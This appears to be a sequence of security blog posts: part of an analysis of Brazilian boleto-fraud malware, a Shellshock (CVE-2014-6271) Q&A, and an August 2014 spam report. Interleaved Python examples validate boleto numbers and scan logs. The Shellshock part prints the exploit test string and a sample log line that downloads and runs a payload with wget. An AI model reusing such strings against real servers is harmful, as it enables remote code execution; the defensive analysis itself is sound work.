Since most boletos are now generated in a browser, the Trojan targeting Internet Explorer users installs a BHO ready to communicate with a C&C and monitor traffic, looking for words such as "boleto" and "pagamento" (payment), choosing the right moment to inject the code and replacing the ID number stored in HTML with a new one, downloaded from the C&C.

It's like SpyEye: code injection in the browser's section

Initially most of these BHOs had a very low detection rate, incorrectly flagged as Trojan banker by normal antimalware products (e.g. the MD5s 23d418f0c23dc877df3f08f26f255bb5 and f089bf60aac48e24cd019edb4360d30d). One example of a request made by these BHOs and a response with a new ID number to be injected:

Request: http://141.105.65.5/11111.11111%2011111.111111%2011111.111111%201%201111111111
Response: 03399.62086 86000.000009 00008.601049 7 00000000000000
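
The response above can be checked digit by digit. The following is an added example, not code from the article: a parser for the ID field that verifies its check digits and compares it with the number a merchant actually issued. It assumes the standard FEBRABAN layout of the 47-digit typeable line (the 44 barcode digits plus one check digit for each of the first three fields), which is background knowledge rather than something the article spells out; the issued boleto is constructed.

```python
import re


def mod10(digits):
    """Check digit of fields 1-3: weights 2,1,2,... from the right, product digits summed."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        product = int(ch) * (2 if i % 2 == 0 else 1)
        total += product // 10 + product % 10
    return (10 - total % 10) % 10


def mod11(digits):
    """General check digit over the other 43 barcode digits: weights 2..9 from the right."""
    total = sum(int(ch) * (2 + i % 8) for i, ch in enumerate(reversed(digits)))
    dv = 11 - total % 11
    return 1 if dv > 9 else dv  # results 10 and 11 are written as 1


def parse_id_field(text):
    """Split the typeable line into its components and verify all four check digits."""
    d = re.sub(r"[\s.]", "", text)
    if not re.fullmatch(r"\d{47}", d):
        raise ValueError("an ID field has 47 digits: %r" % text)
    f1, f2, f3, dv, f5 = d[:10], d[10:21], d[21:32], d[32], d[33:]
    free = f1[4:9] + f2[:10] + f3[:10]  # bank-defined part: account data, "Nosso Número"
    return {
        "bank": f1[:3],
        "currency": f1[3],
        "free_field": free,
        "due_factor": f5[:4],
        "amount_cents": int(f5[4:]),
        "fields_ok": all(mod10(f[:-1]) == int(f[-1]) for f in (f1, f2, f3)),
        "general_ok": mod11(f1[:4] + f5 + free) == int(dv),
    }


def compare(issued, presented):
    """Report what differs between the issuer's record and the number on the document."""
    a, b = parse_id_field(issued), parse_id_field(presented)
    keys = ("bank", "currency", "free_field", "due_factor", "amount_cents")
    changed = [k for k in keys if a[k] != b[k]]
    return {
        "presented_checksums_valid": b["fields_ok"] and b["general_ok"],
        "changed": changed,
        "payee_redirected": "bank" in changed or "free_field" in changed,
    }


# The C&C response quoted in the article.
C2_RESPONSE = "03399.62086 86000.000009 00008.601049 7 00000000000000"
# Constructed issuer record: bank code 001, BRL 150.00, arbitrary free field.
ISSUED = "00191.23454 00000.000000 00000.000000 9 61000000015000"

if __name__ == "__main__":
    print(parse_id_field(C2_RESPONSE))
    print(compare(ISSUED, C2_RESPONSE))
```

Every check digit in the injected number is valid, so neither the payer nor a teller can spot the swap from the digits alone; the comparison has to be made against the issuer's own record of the bank code and free field.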

Compromised websites may also host scripts that generate the new ID number for these boletos:

Or something designed to inject not only a new ID number but a new barcode as well:

We also found very professional control panels used by the fraudsters to collect data from infected machines and register every boleto as soon as it is generated. It's the same infrastructure used in the development of Trojan bankers, as a fraudulent boleto is a new way to steal money from the users.

A bad guy's control panel to control infected machines

Some of the panels offer a lot of details to the crooks, such as the date/hour the boleto was generated/changed, the old ID field and the replacement injected by the malware, the value and the origin – where the boleto was generated, if it was local or on a website.

Another boleto malware panel

Right now it's really easy to find places where wannabe cybercriminals can buy this toolkit and start their own attacks on boletos. A starter pack costs about R$ 500.00 (around US$ 250)

"Only for connoisseurs", the boleto kit malware + panel for sale on Facebook

The Zeus link – encrypted payloads

The boleto malware campaigns combined several new tricks to infect and steal from more users. One of the most recent is the use of non-executable and encrypted malware payloads XORed with a 32-bit key and compressed by ZLIB, using the extensions .BCK, .JMP, .MOD and others.

Encrypted .JMP file downloaded by the boleto malware

It's no coincidence that the same technique was used by the ZeuS GameOver gang. We have evidence of Brazilian criminals cooperating with western European gangs involved with ZeuS and its variants; it's not unusual to find them on underground forums looking for samples, buying new crimeware and ATM/PoS malware. The first results of this cooperation can be seen in the development of new attacks such as the one targeting payments of boletos in Brazil.

Using encrypted payloads offers the criminals an effective way to bypass any firewalls, webfilters, network intrusion detection systems or other defenses that may be in place, as a tiny Trojan downloads these encrypted files and decrypts them to complete the infection.

Decrypted .JMP file: a normal PE executable

Intercepting SSL connections

Another interesting approach seen in boleto malware is the role of Fiddler, a web debugging proxy tool normally used by malware researchers. Some boleto malware uses it to intercept SSL traffic or to do a MitM, aiming to change boletos generated even in HTTPS pages.

We found this behavior in samples such as Trojan.Win32.Badur.imwt:

Boleto Trojan programmed to use Fiddler: MitM in SSL pages

The malware installs SSL certs from FiddlerCore on the infected machine and captures the traffic of HTTPS pages.

Certificate of Fiddler installed by the malware

Attacks against network devices

Investigating the attack vector used by the fraudsters and looking at how the victims got infected we found that all possible techniques are used. Social engineering attacks via well designed e-mail campaigns are the most widespread, but the most aggressive path includes the massive use of RCE on vulnerable DSL modems – in 2011/12 more than 4 million of these devices were attacked in Brazil and had their DNS settings changed by cybercriminals – the same approach is still being used to distribute this malware today.

When an affected user tries to visit popular websites or Brazilian web portals the malicious DNS configured in the DSL modem offers to install a new Flash Player. In reality, accepting this installation will infect the machine with boleto malware.

Is Google.com hosting a Flash Player installer? Nope, it's the malicious DNS in the DSL modem

Another recent move from Brazilian criminals was to spread web-based attacks against home-routers in an attempt to change the DNS of the device. These attacks were called "drive-by-pharming". They can be spread via malicious domains or by compromising popular websites:

News website "Estadão" compromised: the malicious script asks the password of your home router

The malicious script tries to guess the password of your home router. If it succeeds a new DNS server will be configured in the device and the criminals will control all your traffic. If it fails the compromised site will display a box asking for your credentials.

Is the password of your router gvt12345? Just guessing…

Recently we identified more than 30 malicious DNS servers being used in these attacks in Brazil. What does the new DNS server do? It redirects users' connections, serving phishing pages or even fake banking pages that modify every boleto the user generates.

If criminals combine web-based attacks with advertisements they can reach millions of people. This tactic is already being used:

What's the fastest way to attack home routers in Brazil? Using advertising

If the criminals can't compromise your network device, they'll target the ISP. We have already seen a series of DNS poisoning attacks against Net Virtua, one of the biggest Brazilian ISPs. Every time the aim is the same, targeting boletos.

But there was worse to come when cybercriminals decided to move to a more online approach…

Fake websites, fake extensions, fraudulent boletos

Some fraudsters decided that spreading their Trojans wasn't enough. They wanted faster returns and changed their tactics. They looked online, investing in sponsored links, fake websites that claimed to recalculate expired boletos (this is possible with this payment system) and malicious browser extensions for Google Chrome or Firefox.

Malicious Chrome extensions, in the official Store

One attack started with a message promising 100 minutes free Skype credit:

Skype-To-Go free for Chrome users! It's easy, just install an extension…

Why distribute a Trojan when you can trick users into installing a malicious browser extension that controls and monitors all the traffic? That's exactly what the fraudsters did, with the valuable help of the official Google Chrome Web Store, where the malicious extension was hosted:

Trojan-Banker.JS.Banker.bv

And this wasn't the only one, we found more:

Trojan-Banker.JS.BanExt.a, found in June 2014 in the Store, almost 2,000 users installed it

And one more, disguised as financial app that generates (fake) boletos:

Trojan-Banker.JS.Banker.bx, more than 3,800 installations…

The extension was prepared to act just like a BHO on an infected machine: monitor and wait for the moment a boleto is generated, and then communicate with a C&C…

Trojan-Banker.JS.Banker.bw

…and receive a new ID field number, injecting it in the boleto while invalidating the barcode:

To frustrate any attempt to discover the real purpose of the extension there was some obfuscation of the main .JS file inside the .CRX file:

HEXed JavaScript file

After removing the obfuscation we can see the websites it's targeting:

The list includes big Brazilian banks and well-known online stores such as Americanas.com and PagSeguro (a service similar to Paypal). Customers of small banks did not escape from the attack – malicious extensions are set up to target a long list of local banks:

The huge number of malicious extensions prompted Google's decision at the end of May 2014 to limit the installation of Chrome extensions. Now they can only be hosted on the Chrome Web Store, but it is no problem for cybercriminals to put their malicious creations there.

Forcing the developer mode on Google Chrome

One example is Trojan-Banker.Win32.ClearWind.a. Its main target is to install a malicious extension that changes boletos, activating the developer mode on Google Chrome and forcing the installation of any extension, even those not hosted in the official store:

"Developer mode" activated on Chrome. The malware did it

These Trojans were able to infect a lot of people, installing the malicious extension to change boletos:

Trojan-Banker.Win32.ClearWind.a, more than 8,000 installations

Malicious Firefox add-on

But if you use Firefox, you're still at risk; there is a version of a malicious add-on for these users as well:

For bad guys' convenience, the malicious Firefox add-on is hosted on Google Storage:

Trojan-Banker.JS.Banker.cd ready to install a malicious addon to change your boletos

Sponsored links, fake websites

Another interesting characteristic of boletos is that you can generate a counterpart copy, in case you lose the original one. Some banks also offer a service to customers who missed the payment deadline and need to recalculate the value of an expired boleto and reissue it, after paying a small fee. All companies working with boletos offer these services to their customers, generally online, and cybercriminals can attack here as well.

The fraudsters decided to set up malicious websites that claim to offer re-issues or recalculations of expired boletos – but of course the new boleto is totally fake and redirects the payment to the criminals' account. These attacks are carried out with the help of search engines, buying up sponsored link campaigns and putting their fraudulent sites to the top of the results.

In a search for "calcular boleto vencido" (recalculate expired boleto) or "segunda via boleto" (counterpart copy) on Google, the first result is a fraudulent service:

Google isn't the only one – it's the same on Yahoo:

And Ask.com:

Not forgetting Bing:

The fake websites that supposedly offer these services have a very professional design to help trick their victims.

All you need to do is choose the bank that issued the boleto, type in the data and "reissue" it.

Of course the boleto generated has the exact same value and due date you asked for, but the ID field number has new data…

"Your new boleto was generated and registered. Pay it today"

It's not just malware: the boleto gangs are using every possible way of tricking users and stealing their money. A very widespread attack such as this one resulted in many victims.

Online and offline victims

These attacks were especially notorious for their "crossover" to the offline world, stealing from people who do not use internet banking or buy things online. It can even steal from people who have never connected to the Internet in their lives. Several infected computers in thousands of stores all over the country started to generate fraudulent boletos for their customers. Once printed and paid they sent the money directly to the cybercriminals' accounts.

This sparked a real avalanche of Trojans using the same technique, and several businesses were badly affected. Many companies, the association of shopkeepers and the Brazilian government all issued alerts to their customers about the fraudulent boletos issued by these trojans (e.g. 1, 2, 3, 4). A lot of money was stolen and even now this fraud is costing banks, stores and customers dear.

Some cases draw our attention, such as this one of a businesswoman from Campo Grande – her company lost BRL 183,000 (around US$80,000):

That sum was stolen in just 3 days…

The Police Department in the state of Minas Gerais issued an alert to residents, warning that fraudsters had already stolen around BRL 25,000 (US$ 10,000) from businesses:

The police registered 12 cases in the state

To measure the problem we sinkholed a C&C and found several victims – on just one malicious server the logs registered more than 612,000 requests in 3 days. Each one sought a fraudulent ID field to be injected into boletos generated on the infected machines:

Requests to a sinkholed C&C

Looking at these values led us to ask: how much money was stolen? How many victims? It's not easy to get this number if you do not thoroughly understand the Brazilian cybercrime environment.

8 billion?

In July 2014 several media outlets covered some RSA research about a "Cybercrime Scheme Uncovered in Brazil" – those attacks against boletos. Right from the start it offers a shocking figure: possibly as much as US$3.75 billion stolen, BRL 8.6 billion. In other words, it would have been the largest cybercrime heist known to date. To compare how big this number is, Banco do Brasil, the biggest bank in the country, makes US$ 6.6 billion in annual profits. So the bad guys stole half of the money from a big bank? Not so fast…

RSA found 495,793 boletos and 192,227 victims in their investigation. Once inside the control panel, they found the values of all payments that the virus had redirected. Added together, those payments topped the US$3.75 billion mark. This figure, however, includes everything – payments not made and payments that were made but not authorized by the bank (as the fraud was detected).  It also includes any test payments made by other researchers trying to understand the malware behavior or even tests made by the bad guy, or even duplicated entries as some customers tried to generate the same boleto several times.

A C&C displaying testing and duplicated entries

Counting every entry in a C&C resulted in this absurd number of R$ 8 billion, which averages at R$ 16,000 for each boleto. This value is unreal and incorrect – most boletos are worth far less. They also estimated the number of victims at 192,227. They did this by counting unique IP addresses, which is very unreliable. As in other parts of the world, most connections in Brazil use dynamic IP addresses. Other errors in the RSA report were highlighted by the LinhaDefensiva community in this article.

So how much was really stolen with fraudulent boletos? In reality only the banks can suggest a final total. The Brazilian Federation of Banks (FEBRABAN) publishes the combined losses faced by all banks due to electronic fraud each year. The year with the most losses so far was 2011. That year, they lost R$ 1.5 billion, or US$ 680 million.

One thing is certain: Brazilian cybercriminals are moving fast, adopting new techniques to continue attacking and stealing money from boletos. They would not waste their time if the scam was not profitable for them.

How to protect you and your company

This is a common question from users and businesses in Brazil working with boletos. Is it possible to use this payment method securely?

FEBRABAN, the Brazilian Federation of Banks, suggests using DDA (Debito Direto Autorizado, Authorized Direct Debit). This replaces a printed boleto with an electronic bill, automatically withdrawing funds from another person's bank account after both parties pre-authorize the deal.

However some Brazilian companies are concerned by the higher costs associated with DDA. In this case we advise issuing boletos in a PDF format generated on the server-side, instead of using HTML format. At present no Trojan can modify a PDF boleto.

Boleto generated in PDF format: more secure than HTML

Kaspersky Lab customers are protected against these attacks – the Safe Money technology presented in our products can block it entirely by offering the option of opening pages in a safe mode where no malicious code could inject data. This ensures that boletos can be generated securely:

Kaspersky Fraud Prevention platform also stops Trojans designed to capture HTTPS traffic using Fiddler. KFP compares this fake certificate of Fiddler with the real certificate used by the Bank or payment service and then blocks access.

Kaspersky Fraud Prevention in action, blocking an unreliable SSL connection

Conclusions

Today these attacks are a big headache for everyone involved in buying and selling in Brazil – banks, businesses and customers alike. When a customer is hit with a fake boleto he says it's not his fault because he paid. The stores blame the bank for failing to process the payment properly. The bank insists it is only responsible for processing the boleto, not for the content of the paperwork. The buck goes round and round …

To complete the scenario, Brazilian criminals specialize in identity theft. They often open banking accounts in the name of innocent people who know nothing of the situation, using stolen personal data. With money mules and accounts opened in the name of dead people, it's easy to see why it's so difficult to track stolen money.

Boletos are a very local and distinctive payment method; most other countries don't have anything similar and don't even know what a boleto is. Unfortunately security companies pay little attention to Brazil and miss a lot of issues that only local intelligence can detect and offer expertise. Local criminals are strictly limiting their attacks to Brazilian IPs and only install their Trojans on machines operating in Brazilian Portuguese.

Brazilian cybercriminals are following the same path as their counterparts in Russia and China, with a very specialized cybercrime scene where attacks on locals require special effort to understand properly. They are also sharing knowledge with cybercriminals from Eastern Europe, exporting new techniques such as the one described here, clearly inspired by SpyEye, to do code injection.

"Bash" (CVE-2014-6271) vulnerability – Q&A

Thu, 09/25/2014 - 10:45
What is the "bash" vulnerability?

The "bash" vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.

In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash or pass values to shell scripts.

At the time of writing, the vulnerability has already been used for malicious intentions – infecting vulnerable web servers with malware, and also in hacker attacks. Our researchers are constantly gathering new samples and indications of infections based on this vulnerability; and more information about this malware will be published soon.

The key thing to understand is that the vulnerability is not bound to a specific service, for example Apache or nginx. Rather, the vulnerability lies in the bash shell interpreter and allows an attacker to append system level commands to the bash environment variables.

How does it work?

I will use the same examples that we have seen in the advisories and proof-of-concept code that have been published, to explain how it works. When you have a CGI script on a web server, this script automatically reads certain environment variables, for example your IP address, your browser version, and information about the local system.

But just imagine that you could not only pass this normal system information to the CGI script, but could also tell the script to execute system level commands. This would mean that – without having any credentials to the webserver – as soon as you access the CGI script it would read your environment variables; and if these environment variables contain the exploit string, the script would also execute the command that you have specified.

What makes it unique?

This vulnerability is unique, because it's extremely easy to exploit and the impact is incredibly severe – not least because of the amount of vulnerable targets. This does not just affect web servers, it affects any software which uses the bash interpreter and reads data which you can control.

Researchers are also trying to figure out if other interpreters, such as PHP, JSP, Python or Perl, are also affected. Depending on how code is written, sometimes an interpreter actually uses bash to execute certain functions; and if this is the case, it might be that other interpreters could also be used to exploit the CVE-2014-6271 vulnerability.

The impact is incredibly high because there are a lot of embedded devices that use CGI scripts – for example routers, home appliances and wireless access points.  They are also vulnerable and, in many cases, difficult to patch.

How widespread is it?

This is very difficult to say, but we know from our intelligence systems that people started to develop exploits and worms directly after the vulnerability information was published – both whitehat and blackhat researchers are scanning the Internet for vulnerable servers.

It is too early to know how widespread this is, but I know from my own research that there are a great many web servers running CGI scripts, and I am pretty sure that we will also see a lot of other types of exploits being developed that target local files and network daemons. There have been discussions regarding both OpenSSH and dhcp-clients being vulnerable to this attack as well.

How do I check if my system/web site has been affected?

The easiest way to check if your system is vulnerable is to open a bash-shell on your system and execute the following command:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


If the shell returns the string "vulnerable", you should update your system.

Also there are tools for the technical audience out there that can be used to verify if your server is affected by this vulnerability.

Advice on how to fix this problem

The first thing that you need to do is to update your bash version.  Different Linux distributions are offering patches for this vulnerability; and although not all patches have been proven to be completely effective, patching is the first thing to do. Services like Heroku pushed out fixes that will auto-apply within 24 hours, but developers can force the updates too.

If you are using any IDS/IPS I would also recommend that you add/load a signature for this. A lot of public rules have been published.

Also review your webserver configuration. If there are any CGI scripts that you are not using, consider disabling them.

Is there threat to online banking?

This vulnerability is being actively exploited to target servers hosted on the Internet. Even some workstations running Linux and OSX are vulnerable, but an attacker would still need to find an attack vector that will work remotely against your desktop. Proof of concept targeting *nix workstation dhcp clients has been released, but most workstation dhcp process policies prevent actions from this sort of exploit by default.

Exploit attempts that we observed are targeting server vulnerabilities and downloading DDoS bots for further DDoS attacks. It is likely that servers hosting PII and handling sensitive merchant data are being attacked as well, but we have not yet observed it. There are merchants that unfortunately do not patch quickly.

Can I detect if someone has exploited this against me?

We would recommend reviewing your HTTP logs and checking if there is anything suspicious. An example of a malicious pattern:

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"


There are also some patches for bash that log every command that is being passed to the bash interpreter. This is a good way to see if someone has exploited your machine. It won't prevent someone from exploiting this vulnerability, but it will log the attacker's actions on the system.
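The log review recommended above can be automated. The following scanner is an added example, not code from the original article: it flags any access-log field that contains the bash function-definition prefix seen in both strings in this Q&A. The log layout (common/combined format) and every sample line except the first are assumptions constructed for illustration.

```python
import re
from typing import List, NamedTuple, Optional

# "() {" with optional whitespace: the start of a bash function definition,
# common to both strings shown in this Q&A ("() { :;};" and "() { :; };").
FUNC_PREFIX = re.compile(r"\(\s*\)\s*\{")

# Head of an Apache/nginx access-log line in common/combined format (assumed layout).
LINE_HEAD = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+(?P<rest>.*)$'
)
# A double-quoted field; embedded quotes are logged as \" so allow escapes.
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')


class Hit(NamedTuple):
    line_no: int
    ip: Optional[str]
    timestamp: Optional[str]
    status: Optional[int]
    field: str      # part of the line that carried the pattern
    trailing: str   # text after the function body, i.e. what bash was asked to run


def trailing_command(value: str) -> str:
    """Return whatever follows the '{ ... }' function body in value."""
    start = FUNC_PREFIX.search(value).end()
    close = value.find("}", start)
    tail = value[start:] if close == -1 else value[close + 1:]
    return tail.lstrip("; ").strip()


def scan(lines) -> List[Hit]:
    """Return one Hit per log field that contains the function-definition prefix."""
    hits = []
    for n, line in enumerate(lines, 1):
        line = line.rstrip("\n")
        m = LINE_HEAD.match(line)
        if m is None:
            # Malformed or truncated line: test the raw text so it is not missed.
            if FUNC_PREFIX.search(line):
                hits.append(Hit(n, None, None, None, "unparsed line",
                                trailing_command(line)))
            continue
        fields = [("request", m["request"])]
        fields += [(f"quoted field {i}", v)
                   for i, v in enumerate(QUOTED.findall(m["rest"]), 1)]
        for name, value in fields:
            if FUNC_PREFIX.search(value):
                hits.append(Hit(n, m["ip"], m["ts"], int(m["status"]), name,
                                trailing_command(value)))
    return hits


SAMPLE_LOG = [
    # The log line quoted in the Q&A above.
    '192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0" 400 349 '
    '"() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777 /tmp/besh; /tmp/besh;"',
    # Constructed: ordinary request, must not be flagged.
    '203.0.113.7 - - [25/Sep/2014:14:00:05 +0000] "GET /index.html HTTP/1.1" 200 1043 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    # Constructed: pattern in the second quoted field, harmless payload.
    '198.51.100.23 - - [25/Sep/2014:14:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 '
    '"-" "() { :;}; echo probe"',
    # Constructed: truncated line that does not parse.
    '198.51.100.23 "() { :; }; echo truncated',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit shows that the string was sent to the server, not that bash evaluated it; the files or commands named in the trailing text are what to look for next on the host.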

How serious is the threat?

This bug is very dangerous indeed, but not EVERY system is vulnerable. Special conditions must be met for a web server to be exploited. One of the biggest problems now is that when patches are published, researchers will look for other ways to exploit bash, explore different conditions that enable it to be exploited, etc. So a patch that helps prevent remote code execution can't do anything against, for example, a file overwrite. So there will probably be a series of patches and in the meantime systems are still vulnerable.

Is it the new Heartbleed?

Well, it's much easier for a cybercriminal to exploit than Heartbleed. Also, in the case of Heartbleed, a cybercriminal could only steal data from memory, hoping to find something interesting.  By contrast, the bash vulnerability makes full system control much more possible. So it would seem to be more dangerous.

Can it be used in future APT attacks?

It could be used for future malware development, of course. Malware could be used to automatically test infrastructure for such a bug, to infect the system or attack it in some other way.

Spam in August 2014

Thu, 09/25/2014 - 07:00
Spam in the spotlight

In August, fraudulent emails exploited global political events and the names of famous people in the Russian Federation. Malicious files were spread via email, including ones that imitated court summons. Spammers who earn money by advertising medications used popular services to attract the attention of recipients. Spammers also actively advertised travel services and collection agencies.

Malicious court summons

In August we registered several mass mailings imitating court summons in various languages. The English-language version informed recipients that they were being taken to court and should study the case materials to help lodge a defense. Those materials were supposedly in an attachment, which actually contained the Trojan Backdoor.Win32.Kuluoz, capable of downloading and running other malware on the victim computer. By comparing several emails from a single mass mailing we confirmed that some details, such as the time, date and venue of the hearing and the names of the archives of malicious files, varied from email to email. The sender addresses had been generated from a single template in which the scammers simply entered the words from a pre-determined list. The changes in the text were intended to provide more individuality and bypass spam filtering.

As well as the English-language versions, similar malicious spam appeared in Russian and Czech. The scammers tried to convince users that they had unpaid debts due within 15 days. If they didn't pay, recipients were warned that their property could be confiscated and their bank accounts frozen. The attached archive contained Trojan-Downloader.Win32.Agent.heva, a malicious file presented by the fraudsters as financial and legal documents. Once the user ran the Trojan, an RTF file was displayed while the malicious program was downloading and installing Trojan.Win32.Tinba.ei, yet another Trojan designed to steal financial information such as bank account credentials and credit card data. The name of the Trojan is an acronym of 'Tinybanker'. This is a small piece of assembler code, but it has the functionalities of many larger pieces of similar malware.

Politics in "Nigerian" spam

In August, we again came across "Nigerian letters" exploiting the events in Ukraine. In the email written in English the scammers used the name of the former President of Ukraine Viktor Yanukovych to sell their story. This time the popular "Nigerian" trick of asking for help in investing money for a substantial reward came from a former financial adviser to the President, whose money had been secretly transferred to the adviser's personal account in London.

After a long silence the name of Mikhail Khodorkovsky was back again. We came across "Nigerian letters" supposedly written on behalf of his inner circle. To trick readers, the fraudsters spun the standard story offering a reward for assistance in transferring and investing huge sums of money. To make the email look more realistic, the body of the message contained the links to official articles about Khodorkovsky. In addition, it was emphasized that all future transactions were legal and did not present any risk to the victim.

One email provides minimal information, simply asking recipients to contact the scammers if they find the offer interesting. Another email provides details of a tempting offer and stories from Khodorkovsky's life: before the arrest he couldn't withdraw all his money out of Russia and now, after the release, he intends to complete the transfer. However, as the disgraced billionaire cannot use his former company to do this, he is looking for someone to help him. Interestingly, "Nigerian" scammers enable recipients to unsubscribe from their mailing list by sending an email to the link at the end of the message. This is how the fraudsters collect a database of active e-mail addresses for future spam mass mailings.

Medication adverts in fake Google Play emails

Spam messages advertising medications regularly offer pills to lose weight, enhance potency or improve the male sex drive. The body of these emails includes a short text with a link to a website of a store where the advertised product can be bought. Sometimes there is just a link. To send out "pharmaceutical" adverts, the fraudsters often use visual spam. However we sometimes see quite unusual tricks to advertise meds. For example, last autumn we wrote in our blog about a series of mailings which used the names of well-known companies and looked just like typical phishing messages. In August 2014, we noted another similar mass mailing.

This time the phishing email looked like a purchase notification from the Google Play app store. To convince the recipient that the email was genuine, the spammers utilized a realistic-looking sender address as well as the store's official logo. Links in the body text of the email, which often lead to pages on the real website, were inactive this time, even though they were highlighted. It seems that the scammers did not think their fake notifications would get through the spam filters so they made their emails look like classic phishing emails.

Spammers' Indian summer

The English-language segment of the Internet saw spam mass mailings offering special offer tours to Hawaii or Costa Rica or tropical forests, as well as the chance to book a private jet for business or pleasure. These messages came from various addresses and contained the links to newly created sites where users could compare the prices and select the most attractive offer.

We also noted mailings offering to participate in earn-online programs. These were so-called binary options, offering quick and easy income to cover all the costs of the vacation advertised elsewhere.

How (not) to repay a loan

Another common theme in August's spam was debt management for individuals and companies. Spammers sent out colorful messages urging things like "Only pay what you can afford" and promised to wipe out crippling debts. The hyperlink in the email led to a newly created blank site with a name like "Zero-debt-now" with offers of consolidated loans (i.e. to get one credit for paying several others) or favorable credit terms.

Various collection agencies and private lawyers, meanwhile, offered the opposite: specialized services to collect unpaid debts without slow and costly court proceedings. The advertising emails provided a brief description of the activities of the organization, the details of its work, a few statistics (number of collected loans, the number of satisfied customers, etc.) and included a contact phone number. The digits in the telephone numbers were often deliberately distorted or noised to bypass spam filters. The authors of the messages promised a successful outcome even in cases where other specialized services have already failed.

Statistics

The percentage of spam in email traffic

Percentage of spam in email traffic

The percentage of spam in August's email traffic averaged 67.2%, which is only 0.2 percentage points up from July. The amount of unsolicited email increased throughout the month – in early August the percentage of spam averaged 64.9% while in the end it reached 70.4%.

Sources of spam by country

In August, the USA remained the most popular source of spam (15.9%), up 0.7 percentage points from the previous month. Russia was in second place with 6%, up 0.4 percentage points. China was in third place with 4.7%, having produced 0.6 pp less spam than in July.

Sources of spam around the world

Vietnam was in 4th position with 4.7% of all distributed spam; its contribution grew by 1.2 pp which pushed this country up four places in the rankings. It is followed by Argentina (4.4%) which saw little change in its numbers and dropped one place in the table.

Germany (3.6%) remained in 6th place with a slight decrease in the percentage of distributed spam. Ukraine dropped to 8th. Meanwhile, Brazil (2.9%) added 0.5 pp to its previous month's contribution and placed 9th in August's Top 10, which was rounded up with India (2.8%).

Of note is the slight growth of spammer activity in South Korea (1.9%) which also entered the Top 20 in August.

Malicious attachments in email

The graphic below shows the Top 10 malicious programs spread by email in August.

The Top 10 malicious programs spread by email

In August Trojan.JS.Redirector.adf topped the rating of malicious programs most often spread via email. Its name speaks for itself: it is an HTML page containing code that redirects users to a scammer site offering downloads of Binbot, a popular service for automatic online sales of binary options. This malicious program is distributed via email in a ZIP archive which is not password-protected.

Trojan-Downloader.Win32.Upatre.to and Trojan-Downloader.Win32.Upatre.tq were in 3rd and 6th places. These malicious programs are relatively simple, are no more than around 3.5 Kb in size and usually download a Trojan banker from the family known as Dyre/Dyzap/Dyreza. The list of financial organizations targeted by this banker depends on the configuration of the file which is uploaded from the command center.

Trojan-Banker.Win32.Fibbit.rq was fourth. This banking Trojan embeds in Java applications for online banking targeting authentication data and other information, such as keys, transaction replacements and their results.

Backdoor.Win32.Androm.enji and Backdoor.Win32.Androm.erom were fifth and ninth in the ranking. Both malicious programs belong to Andromeda – Gamarue, a universal modular bot with features including downloading, storing and running executable files, downloading DLL (without saving on the disk) and plugins as well as the possibility of self-updating and self-deleting. The functionality of the bot can be expanded using a system of plugins that are loaded by the criminals as required.

Trojan.Win32.Bublik.clhs and Trojan.Win32.Bublik.bwbx, modifications of the notorious Bublik malware, ended in 7th and 8th positions in August. The Bublik malware family is mostly used for the unauthorized download and installation of new versions of malware onto victim computers.

Trojan-Spy.Win32.LssLogger.bos rounded off the Top 10. It is a multifunctional malicious program which is capable of stealing passwords from a wide range of software. All stolen information is then passed to the fraudsters via email.

Distribution of email antivirus detections by country

In August, the UK took the lead with 13.16% of all antivirus detections (+6.26 percentage points).  Germany (9.58%, -1.49 percentage points) and the USA (7.69%, -1.59 percentage points) were 2nd and 3rd respectively.

The most unexpected result arrived from Russia: its share grew by 3.33 pp from July and accounted for 6.73% which moved this country from 8th to 4th position in the ranking.

Italy (3.31%) dropped from 5th to 8th place having lost 1.33 percentage points. Hong Kong outran Australia, Turkey and Vietnam with 2.74% of all antivirus detections (+0.28 percentage points).

Special features of malicious spam

In August, the scammers again used fake notifications from Facebook to distribute malicious attachments. This time, users received a message from an unknown address warning them about the possible deactivation of their accounts. According to the text, over the last few days (and in some emails - months) the social network was attacked by hackers. To avoid any problems, the developers asked the users to install the utility attached to the email.

Each email contained a password-protected ZIP archive with an executable file and a unique password needed to unpack it. The attached archive bore the name of the user to whom the email was addressed (his email account login) and the same name was used to generate a password for the archive. At the end of the email the scammers said that the file could only be opened on a PC running a Microsoft OS. The utility in the archive was in fact a Trojan downloader, a representative of the Trojan-Downloader.Win32.Haze family. This malware downloads other malicious software, usually developed to steal the owner's personal data or to send out infected emails to the addresses on his list of contacts.

Phishing

In August 2014, Kaspersky Lab's anti-phishing component registered 32,653,772 detections which is 12,495,895 detections more than in the previous month. This considerable growth was probably caused by the summer slowdown in the demand for advertising spam. Fraudsters who do not want to lose their earnings switch to mass phishing mailings.

Australia topped the rating of countries most often attacked by phishers: during the month the number of Anti-Phishing component activations on computers of Australian users doubled and accounted for 24.4%. Brazil was 2nd with 19.5% of attacked users. It was followed by the UK (15.2%), Canada (14.6%) and India (14.5%).

The geography of phishing attacks*, August 2014

* The percentage of users on whose computers the Anti-Phishing component was activated, from the total number of all Kaspersky Lab users

Top 10 countries by the percentage of attacked users:

     Country              % of users
1    Australia            24.4
2    Brazil               19.5
3    UK                   15.2
4    Canada               14.6
5    India                14.5
6    UAE                  14.1
7    Ecuador              13.1
8    Dominican Republic   13.0
9    Austria              12.8
10   China                12.7

Targets of attacks by organization

